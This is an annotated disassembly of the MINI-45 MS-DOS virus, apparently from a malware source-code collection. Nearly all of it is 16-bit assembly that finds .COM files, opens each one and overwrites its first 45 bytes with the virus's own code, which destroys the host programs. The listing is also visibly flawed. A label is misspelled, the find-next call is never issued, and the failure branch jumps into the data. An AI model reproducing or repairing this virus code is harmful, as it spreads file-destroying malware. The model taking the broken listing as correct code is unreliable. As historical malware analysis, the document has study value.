MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.mini-45.asm
2021-01-12 17:49:21 -06:00


;***************************************************************
; DISASSEMBLY of the MINI-45 VIRUS
;***************************************************************
; Annotated listing of a 16-bit MS-DOS .COM program (real mode,
; Intel operand order, DOS services through INT 21h).
;
; Behaviour visible in this listing:
;   - searches with the pattern '*.com' (no drive or path given)
;   - opens each match read/write and writes 2Dh (45) bytes taken
;     from offset 0100h of its own image
;   - no seek is issued between open and write, so the write lands
;     at the start of the target file
;
; Analyst notes:
;   - the first 45 bytes of the target are overwritten, not saved;
;     nothing here keeps a copy of the host code, so affected files
;     have to be restored from a clean copy
;   - no call here reads or restores the file date/time or
;     attributes, and no infection marker is checked
;   - the results of the write (AH=40h) and close (AH=3Eh) calls
;     are not tested
;***************************************************************
; FIND .COM FILE TO INFECT
;***************************************************************
MOV DX, 127h ;DS:DX = ASCIIZ search pattern for find-first;
;127h is 27h bytes past the 0100h .COM load
;address - presumably the FILESPEC bytes below,
;confirm against the binary
MOV AH, 4Eh ;DOS function 4Eh = find first matching file
INT 21h ;DOS reports failure by setting the carry flag
JB FILESPEC ;carry set (no match / error): leave the search
;NOTE(review): the target is the data label in
;this listing - verify the exit path in the sample
;****************************************************************
; OPEN FILE
;****************************************************************
FIRST_FILE:
MOV DX, 009Eh ;DS:DX = ASCIIZ name of the matched file:
;default DTA at PSP:0080h + 1Eh (name field
;filled in by find-first / find-next)
MOV AX, 3D02h ;AH=3Dh open existing file,
;AL=02h access mode read/write
;
INT 21h ;on success AX = file handle,
;on failure carry is set
JB NEXT_MATCH ;open failed: skip this file
;****************************************************************
; WRITE VIRUS CODE TO FILE
;****************************************************************
XCHG AX,BX ;BX = file handle, the register that the
;write and close calls below expect it in
;(AX receives the old BX value)
MOV DX, 0100h ;DS:DX = source buffer = start of this
;program's own image in memory
MOV CX, 002Dh ;byte count: 2Dh = 45 decimal
MOV AH, 40h ;DOS function 40h = write to handle
INT 21h ;writes at the current file position, which is
;the start of the file since no seek was issued
;******************************************************************
; CLOSE FILE
;******************************************************************
MOV AH, 3Eh ;DOS function 3Eh = close handle in BX
INT 21h ;close file
;******************************************************************
; FIND NEXT FILE MATCH
;******************************************************************
;NOTE(review): the label below is spelled with a space but is
;referenced as NEXT_MATCH above; read this page as an annotated
;disassembly rather than build-ready source.
NEXT MATCH:
MOV AH, 4Fh ;DOS function 4Fh = find next matching file
JMP FIRST_FILE ;control goes back to the open step
;******************************************************************
; Search pattern data: '*.com' followed by a terminating zero byte.
FILESPEC:
db '*.com' ;wildcard pattern, matched by the find-first call
db 00 ;ASCIIZ terminator